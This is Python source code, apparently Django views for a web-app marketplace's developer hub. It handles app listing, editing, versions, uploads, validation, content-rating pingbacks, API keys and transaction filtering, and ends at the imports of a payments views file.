"""Set up the queryset and filtering for addon listing for Dashboard."""
Filter = AppFilter if webapp else AddonFilter
addons = UserProfile.objects.get(pk=request.user.id).addons
if webapp:
qs = Webapp.objects.filter(id__in=addons.filter(type=amo.ADDON_WEBAPP))
model = Webapp
else:
qs = addons.exclude(type=amo.ADDON_WEBAPP)
model = Addon
filter = Filter(request, qs, 'sort', default, model=model)
return filter.qs, filter
@anonymous_csrf
def login(request, template=None):
return _login(request, template='developers/login.html')
def home(request):
return index(request)
@login_required
def index(request):
# This is a temporary redirect.
return redirect('mkt.developers.apps')
@login_required
def dashboard(request, webapp=False):
addons, filter = addon_listing(request, webapp=webapp)
addons = amo.utils.paginate(request, addons, per_page=10)
data = dict(addons=addons, sorting=filter.field, filter=filter,
sort_opts=filter.opts, webapp=webapp)
return render(request, 'developers/apps/dashboard.html', data)
@dev_required(webapp=True, staff=True)
def edit(request, addon_id, addon, webapp=False):
data = {
'page': 'edit',
'addon': addon,
'webapp': webapp,
'valid_slug': addon.app_slug,
'tags': addon.tags.not_blacklisted().values_list('tag_text',
flat=True),
'previews': addon.get_previews(),
'version': addon.current_version or addon.latest_version
}
if not addon.is_packaged and data['version']:
data['feature_list'] = [unicode(f) for f in
data['version'].features.to_list()]
if acl.action_allowed(request, 'Apps', 'Configure'):
data['admin_settings_form'] = forms.AdminSettingsForm(instance=addon,
request=request)
return render(request, 'developers/apps/edit.html', data)
@dev_required(owner_for_post=True, webapp=True)
@post_required
def delete(request, addon_id, addon, webapp=False):
# Database deletes only allowed for free or incomplete addons.
if not addon.can_be_deleted():
msg = _('Paid apps cannot be deleted. Disable this app instead.')
messages.error(request, msg)
return redirect(addon.get_dev_url('versions'))
# TODO: Force the user to re-auth with BrowserID (this DeleteForm doesn't
# ask the user for his password)
form = forms.DeleteForm(request)
if form.is_valid():
reason = form.cleaned_data.get('reason', '')
addon.delete(msg='Removed via devhub', reason=reason)
messages.success(request, _('App deleted.'))
# Preserve query-string parameters if we were directed from Dashboard.
return redirect(request.GET.get('to') or
reverse('mkt.developers.apps'))
else:
msg = _('Password was incorrect. App was not deleted.')
messages.error(request, msg)
return redirect(addon.get_dev_url('versions'))
@dev_required
@post_required
def enable(request, addon_id, addon):
addon.update(disabled_by_user=False)
amo.log(amo.LOG.USER_ENABLE, addon)
return redirect(addon.get_dev_url('versions'))
@dev_required
@post_required
def disable(request, addon_id, addon):
addon.update(disabled_by_user=True)
amo.log(amo.LOG.USER_DISABLE, addon)
return redirect(addon.get_dev_url('versions'))
@dev_required
@post_required
def publicise(request, addon_id, addon):
if addon.status == amo.STATUS_PUBLIC_WAITING:
addon.update(status=amo.STATUS_PUBLIC)
File.objects.filter(
version__addon=addon, status=amo.STATUS_PUBLIC_WAITING).update(
status=amo.STATUS_PUBLIC)
amo.log(amo.LOG.CHANGE_STATUS, addon.get_status_display(), addon)
# Call update_version, so various other bits of data update.
addon.update_version()
# Call to update names and locales if changed.
addon.update_name_from_package_manifest()
addon.update_supported_locales()
if waffle.switch_is_active('iarc'):
addon.set_iarc_storefront_data()
return redirect(addon.get_dev_url('versions'))
@dev_required(webapp=True)
def status(request, addon_id, addon, webapp=False):
form = forms.AppAppealForm(request.POST, product=addon)
upload_form = NewWebappVersionForm(request.POST or None, is_packaged=True,
addon=addon, request=request)
if request.method == 'POST':
if 'resubmit-app' in request.POST and form.is_valid():
if waffle.switch_is_active('iarc') and not addon.is_rated():
# Cannot resubmit without content ratings.
return http.HttpResponseForbidden(
'This app must obtain content ratings before being '
'resubmitted.')
form.save()
create_comm_note(addon, addon.latest_version,
request.amo_user, form.data['notes'],
note_type=comm.RESUBMISSION)
if addon.vip_app:
handle_vip(addon, addon.current_version, request.amo_user)
messages.success(request, _('App successfully resubmitted.'))
return redirect(addon.get_dev_url('versions'))
elif 'upload-version' in request.POST and upload_form.is_valid():
mobile_only = (addon.latest_version and
addon.latest_version.features.has_qhd)
ver = Version.from_upload(upload_form.cleaned_data['upload'],
addon, [amo.PLATFORM_ALL])
# Update addon status now that the new version was saved.
addon.update_status()
res = run_validator(ver.all_files[0].file_path)
validation_result = json.loads(res)
# Set all detected features as True and save them.
keys = ['has_%s' % feature.lower()
for feature in validation_result['feature_profile']]
data = defaultdict.fromkeys(keys, True)
# Set "Smartphone-Sized Displays" if it's a mobile-only app.
qhd_devices = (set((amo.DEVICE_GAIA,)),
set((amo.DEVICE_MOBILE,)),
set((amo.DEVICE_GAIA, amo.DEVICE_MOBILE,)))
if set(addon.device_types) in qhd_devices or mobile_only:
data['has_qhd'] = True
# Update feature profile for this version.
ver.features.update(**data)
messages.success(request, _('New version successfully added.'))
log.info('[Webapp:%s] New version created id=%s from upload: %s'
% (addon, ver.pk, upload_form.cleaned_data['upload']))
if addon.vip_app:
handle_vip(addon, ver, request.amo_user)
return redirect(addon.get_dev_url('versions.edit', args=[ver.pk]))
ctx = {'addon': addon, 'webapp': webapp, 'form': form,
'upload_form': upload_form}
# Used in the delete version modal.
if addon.is_packaged:
versions = addon.versions.values('id', 'version')
version_strings = dict((v['id'], v) for v in versions)
version_strings['num'] = len(versions)
ctx['version_strings'] = json.dumps(version_strings)
if addon.status == amo.STATUS_REJECTED:
try:
entry = (AppLog.objects
.filter(addon=addon,
activity_log__action=amo.LOG.REJECT_VERSION.id)
.order_by('-created'))[0]
except IndexError:
entry = None
# This contains the rejection reason and timestamp.
ctx['rejection'] = entry and entry.activity_log
if waffle.switch_is_active('preload-apps'):
test_plan = PreloadTestPlan.objects.filter(
addon=addon, status=amo.STATUS_PUBLIC)
if test_plan.exists():
test_plan = test_plan[0]
if (test_plan.last_submission <
settings.PREINSTALL_TEST_PLAN_LATEST):
ctx['outdated_test_plan'] = True
ctx['next_step_suffix'] = 'submit'
else:
ctx['next_step_suffix'] = 'home'
ctx['test_plan'] = test_plan
return render(request, 'developers/apps/status.html', ctx)
def _submission_msgs():
return {
'complete': _('Congratulations, your app submission is now complete '
'and will be reviewed shortly!'),
'content_ratings_saved': _('Content ratings successfully saved.'),
}
def _ratings_success_msg(app, old_status, old_modified):
"""
Ratings can be created via IARC pinging our API.
Thus we can't display a success message via the standard POST/req/res.
To workaround, we stored app's rating's `modified` from edit page.
When hitting back to the ratings summary page, calc what msg to show.
old_status -- app status during ratings edit page.
old_modified -- rating modified datetime during ratings edit page.
"""
if old_modified:
old_modified = datetime.strptime(
old_modified, '%Y-%m-%dT%H:%M:%S')
if old_status != app.status:
# App just created a rating to go pending, show 'app now pending'.
return _submission_msgs()['complete']
elif old_modified != app.last_rated_time():
# App create/update rating, but was already pending/public, show 'ok'.
return _submission_msgs()['content_ratings_saved']
@waffle_switch('iarc')
@dev_required
def content_ratings(request, addon_id, addon):
if not addon.is_rated():
return redirect(addon.get_dev_url('ratings_edit'))
# Use _ratings_success_msg to display success message.
session = request.session
app_id = str(addon.id)
if 'ratings_edit' in session and app_id in session['ratings_edit']:
prev_state = session['ratings_edit'][app_id]
msg = _ratings_success_msg(
addon, prev_state['app_status'], prev_state['rating_modified'])
messages.success(request, msg) if msg else None
del session['ratings_edit'][app_id] # Clear msg so not shown again.
request.session.modified = True
return render(request, 'developers/apps/ratings/ratings_summary.html',
{'addon': addon})
@waffle_switch('iarc')
@dev_required
def content_ratings_edit(request, addon_id, addon):
initial = {}
try:
app_info = addon.iarc_info
initial['submission_id'] = app_info.submission_id
initial['security_code'] = app_info.security_code
except IARCInfo.DoesNotExist:
pass
form = IARCGetAppInfoForm(data=request.POST or None, initial=initial,
app=addon)
if request.method == 'POST' and form.is_valid():
try:
form.save()
return redirect(addon.get_dev_url('ratings'))
except django_forms.ValidationError:
pass # Fall through to show the form error.
# Save some information for _ratings_success_msg.
if not 'ratings_edit' in request.session:
request.session['ratings_edit'] = {}
last_rated = addon.last_rated_time()
request.session['ratings_edit'][str(addon.id)] = {
'app_status': addon.status,
'rating_modified': last_rated.isoformat() if last_rated else None
}
request.session.modified = True
return render(request, 'developers/apps/ratings/ratings_edit.html',
{'addon': addon,
'app_name': get_iarc_app_title(addon),
'form': form,
'company': addon.latest_version.developer_name,
'now': datetime.now().strftime('%Y-%m-%d %H:%M:%S')})
@waffle_switch('preload-apps')
@dev_required
def preload_home(request, addon_id, addon):
"""
Gives information on the preload process, links to test plan template.
"""
return render(request, 'developers/apps/preload/home.html',
{'addon': addon})
@waffle_switch('preload-apps')
@dev_required(owner_for_post=True, webapp=True)
def preload_submit(request, addon_id, addon, webapp):
if request.method == 'POST':
form = PreloadTestPlanForm(request.POST, request.FILES)
if form.is_valid():
# Save test plan file.
test_plan = request.FILES['test_plan']
# Figure the type to save it as (cleaned as pdf/xls from the form).
if test_plan.content_type == 'application/pdf':
filename = 'test_plan_%s.pdf'
else:
filename = 'test_plan_%s.xls'
# Timestamp.
filename = filename % str(time.time()).split('.')[0]
save_test_plan(request.FILES['test_plan'], filename, addon)
# Log test plan.
PreloadTestPlan.objects.filter(addon=addon).update(
status=amo.STATUS_DISABLED
)
PreloadTestPlan.objects.create(addon=addon, filename=filename)
messages.success(
request,
_('Application for preload successfully submitted.'))
return redirect(addon.get_dev_url('versions'))
else:
messages.error(request, _('There was an error with the form.'))
else:
form = PreloadTestPlanForm()
return render(request, 'developers/apps/preload/submit.html',
{'addon': addon, 'form': form})
@dev_required
def version_edit(request, addon_id, addon, version_id):
show_features = addon.is_packaged
formdata = request.POST if request.method == 'POST' else None
version = get_object_or_404(Version, pk=version_id, addon=addon)
version.addon = addon # Avoid extra useless query.
form = AppVersionForm(formdata, instance=version)
all_forms = [form]
if show_features:
appfeatures = version.features
appfeatures_form = AppFeaturesForm(request.POST or None,
instance=appfeatures)
all_forms.append(appfeatures_form)
if request.method == 'POST' and all(f.is_valid() for f in all_forms):
[f.save() for f in all_forms]
if f.data.get('approvalnotes'):
create_comm_note(addon, addon.current_version,
request.amo_user, f.data['approvalnotes'],
note_type=comm.REVIEWER_COMMENT)
messages.success(request, _('Version successfully edited.'))
return redirect(addon.get_dev_url('versions'))
context = {
'addon': addon,
'version': version,
'form': form
}
if show_features:
context.update({
'appfeatures_form': appfeatures_form,
'appfeatures': appfeatures,
'feature_list': [unicode(f) for f in appfeatures.to_list()]
})
return render(request, 'developers/apps/version_edit.html', context)
@dev_required
@post_required
def version_publicise(request, addon_id, addon):
version_id = request.POST.get('version_id')
version = get_object_or_404(Version, pk=version_id, addon=addon)
if version.all_files[0].status == amo.STATUS_PUBLIC_WAITING:
File.objects.filter(version=version).update(status=amo.STATUS_PUBLIC)
amo.log(amo.LOG.CHANGE_VERSION_STATUS, unicode(version.status[0]),
version)
# Call update_version, so various other bits of data update.
addon.update_version()
# If the version we are publishing is the current_version one, and the
# app was in waiting state as well, update the app status.
if (version == addon.current_version and
addon.status == amo.STATUS_PUBLIC_WAITING):
addon.update(status=amo.STATUS_PUBLIC)
amo.log(amo.LOG.CHANGE_STATUS, addon.get_status_display(), addon)
# Call to update names and locales if changed.
addon.update_name_from_package_manifest()
addon.update_supported_locales()
messages.success(request, _('Version successfully made public.'))
return redirect(addon.get_dev_url('versions'))
@dev_required
@post_required
@transaction.commit_on_success
def version_delete(request, addon_id, addon):
version_id = request.POST.get('version_id')
version = get_object_or_404(Version, pk=version_id, addon=addon)
if version.all_files[0].status == amo.STATUS_BLOCKED:
raise PermissionDenied
version.delete()
messages.success(request,
_('Version "{0}" deleted.').format(version.version))
return redirect(addon.get_dev_url('versions'))
@dev_required(owner_for_post=True, webapp=True)
def ownership(request, addon_id, addon, webapp=False):
# Authors.
qs = AddonUser.objects.filter(addon=addon).order_by('position')
user_form = forms.AuthorFormSet(request.POST or None, queryset=qs)
if request.method == 'POST' and user_form.is_valid():
# Authors.
authors = user_form.save(commit=False)
redirect_url = addon.get_dev_url('owner')
for author in authors:
action = None
if not author.id or author.user_id != author._original_user_id:
action = amo.LOG.ADD_USER_WITH_ROLE
author.addon = addon
elif author.role != author._original_role:
action = amo.LOG.CHANGE_USER_WITH_ROLE
author.save()
if action:
amo.log(action, author.user, author.get_role_display(), addon)
if (author._original_user_id and
author.user_id != author._original_user_id):
amo.log(amo.LOG.REMOVE_USER_WITH_ROLE,
(UserProfile, author._original_user_id),
author.get_role_display(), addon)
for author in user_form.deleted_objects:
if author.user_id == request.user.id:
# The current user removed their own access to the app.
redirect_url = reverse('mkt.developers.apps')
amo.log(amo.LOG.REMOVE_USER_WITH_ROLE, author.user,
author.get_role_display(), addon)
messages.success(request, _('Changes successfully saved.'))
return redirect(redirect_url)
ctx = dict(addon=addon, webapp=webapp, user_form=user_form)
return render(request, 'developers/apps/owner.html', ctx)
@anonymous_csrf
def validate_addon(request):
return render(request, 'developers/validate_addon.html', {
'upload_hosted_url':
reverse('mkt.developers.standalone_hosted_upload'),
'upload_packaged_url':
reverse('mkt.developers.standalone_packaged_upload'),
})
@post_required
def _upload(request, addon=None, is_standalone=False):
# If there is no user, default to None (saves the file upload as anon).
form = NewPackagedAppForm(request.POST, request.FILES,
user=getattr(request, 'amo_user', None),
addon=addon)
if form.is_valid():
tasks.validator.delay(form.file_upload.pk)
if addon:
return redirect('mkt.developers.upload_detail_for_addon',
addon.app_slug, form.file_upload.pk)
elif is_standalone:
return redirect('mkt.developers.standalone_upload_detail',
'packaged', form.file_upload.pk)
else:
return redirect('mkt.developers.upload_detail',
form.file_upload.pk, 'json')
@login_required
def upload_new(*args, **kwargs):
return _upload(*args, **kwargs)
@anonymous_csrf
def standalone_packaged_upload(request):
return _upload(request, is_standalone=True)
@dev_required
def upload_for_addon(request, addon_id, addon):
return _upload(request, addon=addon)
@dev_required
def refresh_manifest(request, addon_id, addon, webapp=False):
log.info('Manifest %s refreshed for %s' % (addon.manifest_url, addon))
_update_manifest(addon_id, True, {})
return http.HttpResponse(status=204)
@post_required
@json_view
@write
def _upload_manifest(request, is_standalone=False):
form = forms.NewManifestForm(request.POST, is_standalone=is_standalone)
if (not is_standalone and
waffle.switch_is_active('webapps-unique-by-domain')):
# Helpful error if user already submitted the same manifest.
dup_msg = trap_duplicate(request, request.POST.get('manifest'))
if dup_msg:
return {'validation': {'errors': 1, 'success': False,
'messages': [{'type': 'error', 'message': dup_msg,
'tier': 1}]}}
if form.is_valid():
upload = FileUpload.objects.create()
tasks.fetch_manifest.delay(form.cleaned_data['manifest'], upload.pk)
if is_standalone:
return redirect('mkt.developers.standalone_upload_detail',
'hosted', upload.pk)
else:
return redirect('mkt.developers.upload_detail', upload.pk, 'json')
else:
error_text = _('There was an error with the submission.')
if 'manifest' in form.errors:
error_text = ' '.join(form.errors['manifest'])
error_message = {'type': 'error', 'message': error_text, 'tier': 1}
v = {'errors': 1, 'success': False, 'messages': [error_message]}
return make_validation_result(dict(validation=v, error=error_text))
@login_required
def upload_manifest(*args, **kwargs):
"""Wrapper function for `_upload_manifest` so we can keep the
standalone validator separate from the manifest upload stuff.
"""
return _upload_manifest(*args, **kwargs)
def standalone_hosted_upload(request):
return _upload_manifest(request, is_standalone=True)
@json_view
@anonymous_csrf_exempt
def standalone_upload_detail(request, type_, uuid):
upload = get_object_or_404(FileUpload, uuid=uuid)
url = reverse('mkt.developers.standalone_upload_detail',
args=[type_, uuid])
return upload_validation_context(request, upload, url=url)
@dev_required
@json_view
def upload_detail_for_addon(request, addon_id, addon, uuid):
upload = get_object_or_404(FileUpload, uuid=uuid)
return json_upload_detail(request, upload, addon=addon)
def make_validation_result(data):
"""Safe wrapper around JSON dict containing a validation result."""
if not settings.EXPOSE_VALIDATOR_TRACEBACKS:
if data['error']:
# Just expose the message, not the traceback.
data['error'] = data['error'].strip().split('\n')[-1].strip()
if data['validation']:
for msg in data['validation']['messages']:
for k, v in msg.items():
msg[k] = escape_all(v)
return data
@dev_required(allow_editors=True)
def file_validation(request, addon_id, addon, file_id):
file = get_object_or_404(File, id=file_id)
v = addon.get_dev_url('json_file_validation', args=[file.id])
return render(request, 'developers/validation.html',
dict(validate_url=v, filename=file.filename,
timestamp=file.created, addon=addon))
@json_view
@csrf_exempt
@dev_required(allow_editors=True)
def json_file_validation(request, addon_id, addon, file_id):
file = get_object_or_404(File, id=file_id)
if not file.has_been_validated:
if request.method != 'POST':
return http.HttpResponseNotAllowed(['POST'])
try:
v_result = tasks.file_validator(file.id)
except Exception, exc:
log.error('file_validator(%s): %s' % (file.id, exc))
error = "\n".join(traceback.format_exception(*sys.exc_info()))
return make_validation_result({'validation': '',
'error': error})
else:
v_result = file.validation
validation = json.loads(v_result.validation)
return make_validation_result(dict(validation=validation, error=None))
@json_view
def json_upload_detail(request, upload, addon=None):
result = upload_validation_context(request, upload, addon=addon)
if result['validation']:
if result['validation']['errors'] == 0:
try:
parse_addon(upload, addon=addon)
except django_forms.ValidationError, exc:
m = []
for msg in exc.messages:
# Simulate a validation error so the UI displays it.
m.append({'type': 'error', 'message': msg, 'tier': 1})
v = make_validation_result(dict(error='',
validation=dict(messages=m)))
return json_view.error(v)
return result
def upload_validation_context(request, upload, addon=None, url=None):
if not settings.VALIDATE_ADDONS:
upload.task_error = ''
upload.is_webapp = True
upload.validation = json.dumps({'errors': 0, 'messages': [],
'metadata': {}, 'notices': 0,
'warnings': 0})
upload.save()
validation = json.loads(upload.validation) if upload.validation else ''
if not url:
if addon:
url = reverse('mkt.developers.upload_detail_for_addon',
args=[addon.app_slug, upload.uuid])
else:
url = reverse('mkt.developers.upload_detail',
args=[upload.uuid, 'json'])
report_url = reverse('mkt.developers.upload_detail', args=[upload.uuid])
return make_validation_result(dict(upload=upload.uuid,
validation=validation,
error=upload.task_error, url=url,
full_report_url=report_url))
def upload_detail(request, uuid, format='html'):
upload = get_object_or_404(FileUpload, uuid=uuid)
if format == 'json' or request.is_ajax():
return json_upload_detail(request, upload)
validate_url = reverse('mkt.developers.standalone_upload_detail',
args=['hosted', upload.uuid])
return render(request, 'developers/validation.html',
dict(validate_url=validate_url, filename=upload.name,
timestamp=upload.created))
@dev_required(webapp=True, staff=True)
def addons_section(request, addon_id, addon, section, editable=False,
webapp=False):
basic = AppFormBasic if webapp else addon_forms.AddonFormBasic
models = {'basic': basic,
'media': AppFormMedia,
'details': AppFormDetails,
'support': AppFormSupport,
'technical': AppFormTechnical,
'admin': forms.AdminSettingsForm}
is_dev = acl.check_addon_ownership(request, addon, dev=True)
if section not in models:
raise http.Http404()
version = addon.current_version or addon.latest_version
tags, previews, restricted_tags = [], [], []
cat_form = appfeatures = appfeatures_form = version_form = None
formdata = request.POST if request.method == 'POST' else None
# Permissions checks.
# Only app owners can edit any of the details of their apps.
# Users with 'Apps:Configure' can edit the admin settings.
if (section != 'admin' and not is_dev) or (section == 'admin' and
not acl.action_allowed(request, 'Apps', 'Configure') and
not acl.action_allowed(request, 'Apps', 'ViewConfiguration')):
raise PermissionDenied
if section == 'basic':
cat_form = CategoryForm(formdata, product=addon, request=request)
# Only show/use the release notes form for hosted apps, packaged apps
# can do that from the version edit page.
if not addon.is_packaged:
version_form = AppVersionForm(formdata, instance=version)
elif section == 'media':
previews = PreviewFormSet(
request.POST or None, prefix='files',
queryset=addon.get_previews())
elif section == 'technical':
# Only show/use the features form for hosted apps, packaged apps
# can do that from the version edit page.
if not addon.is_packaged:
appfeatures = version.features
appfeatures_form = AppFeaturesForm(formdata, instance=appfeatures)
elif section == 'admin':
tags = addon.tags.not_blacklisted().values_list('tag_text', flat=True)
restricted_tags = addon.tags.filter(restricted=True)
# Get the slug before the form alters it to the form data.
valid_slug = addon.app_slug
if editable:
if request.method == 'POST':
if (section == 'admin' and
not acl.action_allowed(request, 'Apps', 'Configure')):
raise PermissionDenied
form = models[section](formdata, request.FILES,
instance=addon, request=request)
all_forms = [form, previews]
for additional_form in (appfeatures_form, cat_form, version_form):
if additional_form:
all_forms.append(additional_form)
if all(not f or f.is_valid() for f in all_forms):
if cat_form:
cat_form.save()
addon = form.save(addon)
if appfeatures_form:
appfeatures_form.save()
if version_form:
# We are re-using version_form without displaying all its
# fields, so we need to override the boolean fields,
# otherwise they'd be considered empty and therefore False.
version_form.cleaned_data['publish_immediately'] = (
version_form.fields['publish_immediately'].initial)
version_form.save()
if 'manifest_url' in form.changed_data:
addon.update(
app_domain=addon.domain_from_url(addon.manifest_url))
update_manifests([addon.pk])
if previews:
for preview in previews.forms:
preview.save(addon)
editable = False
if section == 'media':
amo.log(amo.LOG.CHANGE_ICON, addon)
else:
amo.log(amo.LOG.EDIT_PROPERTIES, addon)
valid_slug = addon.app_slug
else:
form = models[section](instance=addon, request=request)
else:
form = False
data = {'addon': addon,
'webapp': webapp,
'version': version,
'form': form,
'editable': editable,
'tags': tags,
'restricted_tags': restricted_tags,
'cat_form': cat_form,
'version_form': version_form,
'preview_form': previews,
'valid_slug': valid_slug, }
if appfeatures_form and appfeatures:
data.update({
'appfeatures': appfeatures,
'feature_list': [unicode(f) for f in appfeatures.to_list()],
'appfeatures_form': appfeatures_form
})
return render(request, 'developers/apps/edit/%s.html' % section, data)
@never_cache
@dev_required(skip_submit_check=True)
@json_view
def image_status(request, addon_id, addon, icon_size=64):
# Default icon needs no checking.
if not addon.icon_type or addon.icon_type.split('/')[0] == 'icon':
icons = True
# Persona icon is handled differently.
elif addon.type == amo.ADDON_PERSONA:
icons = True
else:
icons = os.path.exists(os.path.join(addon.get_icon_dir(),
'%s-%s.png' %
(addon.id, icon_size)))
previews = all(os.path.exists(p.thumbnail_path)
for p in addon.get_previews())
return {'overall': icons and previews,
'icons': icons,
'previews': previews}
@json_view
def ajax_upload_media(request, upload_type):
errors = []
upload_hash = ''
if 'upload_image' in request.FILES:
upload_preview = request.FILES['upload_image']
upload_preview.seek(0)
content_type = upload_preview.content_type
errors, upload_hash = check_upload(upload_preview, upload_type,
content_type)
else:
errors.append(_('There was an error uploading your preview.'))
if errors:
upload_hash = ''
return {'upload_hash': upload_hash, 'errors': errors}
@dev_required
def upload_media(request, addon_id, addon, upload_type):
return ajax_upload_media(request, upload_type)
@dev_required
@post_required
def remove_locale(request, addon_id, addon):
locale = request.POST.get('locale')
if locale and locale != addon.default_locale:
addon.remove_locale(locale)
return http.HttpResponse()
return http.HttpResponseBadRequest()
def docs(request, doc_name=None, doc_page=None):
filename = ''
all_docs = {'policies': ['agreement']}
if doc_name and doc_name in all_docs:
filename = '%s.html' % doc_name
if doc_page and doc_page in all_docs[doc_name]:
filename = '%s-%s.html' % (doc_name, doc_page)
else:
# TODO: Temporary until we have a `policies` docs index.
filename = None
if not filename:
return redirect('ecosystem.landing')
return render(request, 'developers/docs/%s' % filename)
@login_required
def terms(request):
form = forms.DevAgreementForm({'read_dev_agreement': True},
instance=request.amo_user)
if request.POST and form.is_valid():
form.save()
log.info('Dev agreement agreed for user: %s' % request.amo_user.pk)
if request.GET.get('to') and request.GET['to'].startswith('/'):
return redirect(request.GET['to'])
messages.success(request, _('Terms of service accepted.'))
return render(request, 'developers/terms.html',
{'accepted': request.amo_user.read_dev_agreement,
'agreement_form': form})
@login_required
def api(request):
roles = request.amo_user.groups.filter(name='Admins').exists()
f = APIConsumerForm()
if roles:
messages.error(request,
_('Users with the admin role cannot use the API.'))
elif request.method == 'POST':
if 'delete' in request.POST:
try:
consumer = Access.objects.get(pk=request.POST.get('consumer'))
consumer.delete()
except Access.DoesNotExist:
messages.error(request, _('No such API key.'))
else:
key = 'mkt:%s:%s:%s' % (
request.amo_user.pk,
request.amo_user.email,
Access.objects.filter(user=request.user).count())
access = Access.objects.create(key=key,
user=request.user,
secret=generate())
f = APIConsumerForm(request.POST, instance=access)
if f.is_valid():
f.save()
messages.success(request, _('New API key generated.'))
else:
access.delete()
consumers = list(Access.objects.filter(user=request.user))
return render(request, 'developers/api.html',
{'consumers': consumers, 'roles': roles, 'form': f})
@addon_view
@post_required
@any_permission_required([('Admin', '%'),
('Apps', 'Configure')])
def blocklist(request, addon):
"""
Blocklists the app by creating a new version/file.
"""
if addon.status != amo.STATUS_BLOCKED:
addon.create_blocklisted_version()
messages.success(request, _('Created blocklisted version.'))
else:
messages.info(request, _('App already blocklisted.'))
return redirect(addon.get_dev_url('versions'))
@waffle_switch('view-transactions')
@login_required
def transactions(request):
form, transactions = _get_transactions(request)
return render(request, 'developers/transactions.html',
{'form': form, 'CONTRIB_TYPES': amo.CONTRIB_TYPES,
'count': transactions.count(),
'transactions': amo.utils.paginate(
request, transactions, per_page=50)})
def _get_transactions(request):
apps = addon_listing(request, webapp=True)[0]
transactions = Contribution.objects.filter(addon__in=list(apps),
type__in=amo.CONTRIB_TYPES)
form = TransactionFilterForm(request.GET, apps=apps)
if form.is_valid():
transactions = _filter_transactions(transactions, form.cleaned_data)
return form, transactions
def _filter_transactions(qs, data):
"""Handle search filters and queries for transactions."""
filter_mapping = {'app': 'addon_id',
'transaction_type': 'type',
'transaction_id': 'uuid',
'date_from': 'created__gte',
'date_to': 'created__lte'}
for form_field, db_field in filter_mapping.iteritems():
if data.get(form_field):
try:
qs = qs.filter(**{db_field: data[form_field]})
except ValueError:
continue
return qs
def testing(request):
return render(request, 'developers/testing.html')
@addon_view
def debug(request, addon):
if not settings.DEBUG:
raise http.Http404
data = {
'urls': {'es': '%s/apps/webapp/%s' % (settings.ES_URLS[0], addon.pk)},
'pay_request': ''
}
if addon.is_premium():
data['pay_request'] = get_product_jwt(
WebAppProduct(addon),
user=request.amo_user,
region=request.REGION,
source=request.REQUEST.get('src', ''),
lang=request.LANG
)['webpayJWT']
return render(request, 'developers/debug.html',
{'app': addon, 'data': data})
class ContentRatingList(CORSMixin, SlugOrIdMixin, ListAPIView):
model = ContentRating
serializer_class = ContentRatingSerializer
permission_classes = (AllowAny,)
cors_allowed_methods = ['get']
queryset = Webapp.objects.all()
slug_field = 'app_slug'
@skip_cache
def get(self, request, *args, **kwargs):
app = self.get_object()
self.queryset = app.content_ratings.all()
if 'since' in request.GET:
form = ContentRatingForm(request.GET)
if form.is_valid():
self.queryset = self.queryset.filter(
modified__gt=form.cleaned_data['since'])
if not self.queryset.exists():
raise http.Http404()
return super(ContentRatingList, self).get(self, request)
class ContentRatingsPingback(CORSMixin, SlugOrIdMixin, CreateAPIView):
cors_allowed_methods = ['post']
parser_classes = (lib.iarc.utils.IARC_JSON_Parser,)
permission_classes = (AllowAny,)
queryset = Webapp.objects.all()
slug_field = 'app_slug'
def post(self, request, pk, *args, **kwargs):
log.info(u'Received IARC pingback for app:%s' % pk)
if request.content_type != 'application/json':
log.info(u'IARC pingback not of content-type "application/json"')
return Response({
'detail': "Endpoint only accepts 'application/json'."
}, status=http_status.HTTP_415_UNSUPPORTED_MEDIA_TYPE)
app = self.get_object()
# Verify token.
data = request.DATA[0]
if app.iarc_token() != data.get('token'):
log.info(u'Token mismatch in IARC pingback for app:%s' % app.id)
return Response({'detail': 'Token mismatch'},
status=http_status.HTTP_400_BAD_REQUEST)
if data.get('ratings'):
# Double-check with IARC that it's the correct rating.
if not self.verify_data(data):
return Response('The ratings do not match the submission ID.',
status=http_status.HTTP_400_BAD_REQUEST)
log.info(u'Setting content ratings from IARC pingback for app:%s' %
app.id)
# We found a rating, so store the id and code for future use.
if 'submission_id' in data and 'security_code' in data:
app.set_iarc_info(data['submission_id'], data['security_code'])
# Update status if incomplete status.
# Do this before set_content_ratings to not prematurely trigger
# a refresh.
log.info('Checking app:%s completeness after IARC pingback.'
% app.id)
if (app.has_incomplete_status() and
app.is_fully_complete(ignore_ratings=True)):
log.info('Updating app status from IARC pingback for app:%s' %
app.id)
# Don't call update to prevent recursion in update_status.
app.update(status=amo.STATUS_PENDING)
log.info('Updated app status from IARC pingback for app:%s' %
app.id)
elif app.has_incomplete_status():
log.info('Reasons for app:%s incompleteness after IARC '
'pingback: %s' % (app.id, app.completion_errors()))
app.set_descriptors(data.get('descriptors', []))
app.set_interactives(data.get('interactives', []))
# Set content ratings last since it triggers a refresh on Content
# Ratings page. We want descriptors and interactives visible by
# the time it's refreshed.
app.set_content_ratings(data.get('ratings', {}))
return Response('ok')
def verify_data(self, data):
client = lib.iarc.client.get_iarc_client('services')
xml = lib.iarc.utils.render_xml('get_app_info.xml', data)
resp = client.Get_App_Info(XMLString=xml)
check_data = lib.iarc.utils.IARC_XML_Parser().parse_string(resp)
try:
check_data = check_data.get('rows', [])[0]
except IndexError:
return False
rates_bad = data.get('ratings') != check_data.get('ratings')
inter_bad = (set(data.get('interactives', [])) !=
set(check_data.get('interactives', [])))
descs_bad = (set(data.get('descriptors', [])) !=
set(check_data.get('descriptors', [])))
if rates_bad:
log.error('IARC pingback did not match rating %s vs %s' %
(data.get('ratings'), check_data.get('ratings')))
if inter_bad:
log.error('IARC pingback did not match interactives %s vs %s' %
(data.get('interactives'),
check_data.get('interactives')))
if descs_bad:
log.error('IARC pingback did not match descriptors %s vs %s' %
(data.get('descriptors'), check_data.get('descriptors')))
if rates_bad or inter_bad or descs_bad:
return False
return True
########NEW FILE########
__FILENAME__ = views_payments
import functools
import json
import urllib
from django import http
from django.conf import settings
from django.core.urlresolvers import reverse
from django.shortcuts import get_object_or_404, redirect, render
import commonware
import jinja2
import waffle
from curling.lib import HttpClientError
from tower import ugettext as _
from waffle.decorators import waffle_switch
import amo
from access import acl
from amo import messages
from amo.decorators import json_view, login_required, post_required, write
from constants.payments import (PAYMENT_METHOD_ALL, PAYMENT_METHOD_CARD,
PAYMENT_METHOD_OPERATOR, PROVIDER_BANGO,
PROVIDER_CHOICES)
from lib.crypto import generate_key
from lib.pay_server import client
from mkt.constants import DEVICE_LOOKUP, PAID_PLATFORMS
from mkt.developers import forms, forms_payments
from mkt.developers.decorators import dev_required
from mkt.developers.models import CantCancel, PaymentAccount, UserInappKey
from mkt.developers.providers import get_provider, get_providers
from mkt.inapp.models import InAppProduct
from mkt.inapp.serializers import InAppProductForm
from mkt.webapps.models import Webapp
from mkt.prices.models import Price
